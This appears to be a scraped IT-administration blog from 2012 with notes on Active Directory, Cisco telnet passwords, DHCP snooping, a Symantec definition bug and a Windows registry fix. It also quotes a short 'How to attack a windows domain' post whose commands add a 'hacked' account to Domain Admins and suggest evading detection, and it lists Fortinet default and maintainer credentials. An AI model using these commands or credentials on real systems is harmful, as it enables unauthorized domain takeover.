Step 1:
Click on : View > Advanced Features
Step 2:
Right click on the OU you want to remove and then Properties ;
Click on Object tab ;
Uncheck the box Protect object from accidental deletion.
2012年7月25日星期三
2012年7月17日星期二
Configure Cisco switch telnet login and password
1.) Connect console cable
2.) Use terminal emulation program to connect to switch or router. The default settings should be: Bits Per Second: 9600, Data Bits: 8, Parity: None, Stop Bits: 1, Flow Control: None. Connect
3.) Enter Privileged Exec mode via typing enable. The prompt with “>” dictates that it is “user” mode. Exec mode is “#”.
4.) Enter configure terminal mode by typing that in after enable (while in exec/privileged mode)or config t for short.
5.) Type in line vty 0 15 (meaning virtual telnet 0 – 15, 16 in all. You can set different passwords for different vtys. It is not limited to ONLY 0 15. Meaning ONLY 0-15.)
6.) Type “password *password*”, where the asterisks dictate what you want to set your password as.
2.) Use terminal emulation program to connect to switch or router. The default settings should be: Bits Per Second: 9600, Data Bits: 8, Parity: None, Stop Bits: 1, Flow Control: None. Connect
3.) Enter Privileged Exec mode via typing enable. The prompt with “>” dictates that it is “user” mode. Exec mode is “#”.
4.) Enter configure terminal mode by typing that in after enable (while in exec/privileged mode)or config t for short.
5.) Type in line vty 0 15 (meaning virtual telnet 0 – 15, 16 in all. You can set different passwords for different vtys. It is not limited to ONLY 0 15. Meaning ONLY 0-15.)
6.) Type “password *password*”, where the asterisks dictate what you want to set your password as.
DHCP Snooping
DHCP snooping acts like a firewall between untrusted hosts and DHCP servers. You use DHCP snooping to differentiate between untrusted interfaces connected to the end user and trusted interfaces connected to the DHCP server or another switch. When a switch receives a packet on an untrusted interface and the interface belongs to a VLAN that has DHCP snooping enabled, the switch compares the source MAC address and the DHCP client hardware address. If the addresses match (the default), the switch forwards the packet. If the addresses do not match, the switch drops the packet. The switch drops a DHCP packet when one of these situations occurs:
·
A packet from a DHCP server,
such as a DHCPOFFER, DHCPACK, DHCPNAK, or DHCPLEASEQUERY packet, is received
from outside the network or firewall.
·
A packet is received on an
untrusted interface, and the source MAC address and the DHCP client hardware
address do not match.
·
The switch receives a
DHCPRELEASE or DHCPDECLINE broadcast message that has a MAC address in the DHCP
snooping binding database, but the interface information in the binding
database does not match the interface on which the message was received.
·
A DHCP relay agent forwards a
DHCP packet, which includes a relay-agent IP address that is not 0.0.0.0, or
the relay agent forwards a packet that includes option-82 information to an
untrusted port.
Refer to DHCP Snooping Configuration Guidelines for the
guidelines on how to configure DHCP snooping.Note: For DHCP snooping to function properly, all DHCP servers must be connected to the switch through trusted interfaces.
Note: In a switch stack with Catalyst 3750 Switches, DHCP snooping is managed on the stack master. When a new switch joins the stack, the switch receives DHCP snooping configuration from the stack master. When a member leaves the stack, all DHCP snooping bindings associated with the switch age out.
Note: In order to ensure that the lease time in the database is accurate, Cisco recommends that you enable and configure NTP. If NTP is configured, the switch writes binding changes to the binding file only when the switch system clock is synchronized with NTP.
Rogue DHCP servers can be mitigated by DHCP snooping features. The ip dhcp snooping command is issued in order to enable DHCP globally on the switch. When configured with DHCP snooping, all ports in the VLAN are untrusted for DHCP replies. Here, only the FastEthernet interface 1/0/3 connected to the DHCP server is configured as trusted.
DHCP Snooping
|
Cat3750#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Cat3750(config)#ip dhcp snooping
!--- Enables DHCP snooping on the switch.
Cat3750(config)#ip dhcp snooping vlan 1
!--- DHCP snooping is not active until DHCP snooping is enabled on a VLAN.
Cat3750(config)#no ip dhcp snooping information option
!--- Disable the insertion and removal of the option-82 field, if the
!--- DHCP clients and the DHCP server reside on the same IP network or subnet.
Cat3750(config)#interface fastEthernet 1/0/3
Cat3750(config-if)#ip dhcp snooping trust
!--- Configures the interface connected to the DHCP server as trusted.
Cat3750#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
1
Insertion of option 82 is disabled
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Interface Trusted Rate limit (pps)
------------------------ ------- ----------------
FastEthernet1/0/3 yes unlimited
!--- Displays the DHCP snooping configuration for the switch.
Cat3750#show ip dhcp snooping binding
MacAddress IpAddress Lease(sec) Type VLAN Interface
------------------ --------------- ---------- ------------- ---- --------------------
00:11:85:A5:7B:F5 10.0.0.2 86391 dhcp-snooping 1 FastEtheret1/0/1
00:11:85:8D:9A:F9 10.0.0.3 86313 dhcp-snooping 1 FastEtheret1/0/2
Total number of bindings: 2
!--- Displays the DHCP snooping binding entries for the switch.
Cat3750#
!--- DHCP server(s) connected to the untrusted port will not be able
!--- to assign IP addresses to the clients.
|
2012年7月16日星期一
Fortinet Deflaut Account
| User Name | Password | Description | |
|---|---|---|---|
| admin | (none) | ||
| - Admin access (Telnet) | |||
| maintainer | bcpb+serial# | ||
| - serial# has to be in caps - Admin access (Console) | |||
| maintainer | admin | ||
| - Admin access (Console) |
ref: http://www.default-password.info/fortinet/
Fortigate Command - Setting back to factory defaults using the console cable
Connect with a terminal program (like hyperterminal or putty)
connect with these settings:
8 bits
no parity
1 stop bit
9600 baud (the FortiGate-300 uses 115,000 baud)
Flow Control = None
log in as admin (perhaps with no password - perhaps with a password you set)
run this from the CLI:
exec factoryreset
ref: http://t-solve.blogspot.hk/2010/06/setting-fortigate-back-to-factory.html
connect with these settings:
8 bits
no parity
1 stop bit
9600 baud (the FortiGate-300 uses 115,000 baud)
Flow Control = None
log in as admin (perhaps with no password - perhaps with a password you set)
run this from the CLI:
exec factoryreset
ref: http://t-solve.blogspot.hk/2010/06/setting-fortigate-back-to-factory.html
Symantec Communications Brief - Symantec Customers Experiencing Blue Screen Issues
Dear Customers,
On 11 July night, we found a defect on SEP
12.1 VD, which might cause some Win XP machines Blue Screen Of Death issue.
Below is the whole story and how to avoid the issue and what’s the work around
for your reference.
Problem
On July 11th, 2012
at approximately 22.30 PST, Symantec starting receiving reports of customers
experiencing blue screens after applying Antivirus Definitions July 11th
revision 18 and Proactive Threat Protection Definitions July 11th rev 11.
Machines may continue to blue screen after they reboot. This problem only
appears to occur on Windows XP machines running SEP 12.1.
Error
Blue screen (BSOD)
with code 0x000000CB after installing the definitions from 11/07/2012 rev. 11
or rev. 18
Environment
SEP 12.1 Systems on
Windows XP 32 bit and 64 bit
Cause
Symantec has
reproduced the problem and is now trying to identify the root cause. We have
posted updated signatures which resolve the issue to the public LiveUpdate
production servers.
Solution
Symantec has posted
updated signatures which resolve the issue to the public LiveUpdate production
servers. To work around the issue please follow these steps on the impacted
machines.
For Enterprise
customers, make sure you have updated to the latest virus definitions on the
Symantec Endpoint Protection Manager(SEPM)
1. Open the Symantec Endpoint Protection Manager
2. Login
3. Select "Admin"
4. Select "Local site"
5. Select "Download
LiveUpdate content"
On affected client
machines running Symantec Endpoint Protection 12.1
1. Start computer in safe mode
2. Navigate to the Symantec Endpoint Protection
definition directory: C:\Documents and Settings\All Users\Application
Data\Symantec\Symantec Endpoint
Protection\CurrentVersion\Data\Definitions\BASHDefs
3. Delete the latest content directory (should be
20120711.011)
4. Reboot
Note: If the client is pulling down content from
LiveUpdate or LiveUpdate Administrator, please run LiveUpdate. If the client is
pulling down content from the SEPM, the content will be automatically
downloaded without any interaction. Until the content is delivered, the client
UI may show with a warning due to missing content.
When the system has
been updated properly in the client user interface for Proactive Threat
Protection the definition versions will be Wednesday, July 11, 2012 r12
Article URL
http://www.symantec.com/docs/TECH192811
Thanks & Regards,
Linda
2012年7月12日星期四
How to attack a windows domain
Code:
C:\net user hacked 0h3ck3d! /add /domain net user hacked 0h3cked! /add /domain The request will be processed at a domain controller for domain blackhat.com. The command completed successfully.
Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.
At this point we have control over the domain and can likely log into any workstation which is on the domain.
Code:
ref: http://www.coresec.org/2011/03/27/how-to-attack-a-windows-domain/
C:\net group “domain admins” hacked /add /domain net group “domain admins” hacked /add /domain The reuqest will be processed at a domain controller for domain blackhat.com The command completed successfully.
2012年7月6日星期五
Windows 7 Does Not Detect My DVD ROM Drive
To do this, follow these steps:
- Open Registry for editing (Regedit.exe).
- Locate, and then click the following registry sub key:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}Caution
To make sure that you are in the appropriate registry sub key, make sure that the Default data value is DVD/CD-ROM and the Class data value is CDROM.
- In the right pane, right-click UpperFilters, and then click Delete.
- Click Yes to confirm the removal of the UpperFilters registry entry.
- Do the same to the LowerFilters
- Exit Registry Editor, and then restart the computer.
That it, The CD/DVD should now be working as expected.
訂閱:
文章 (Atom)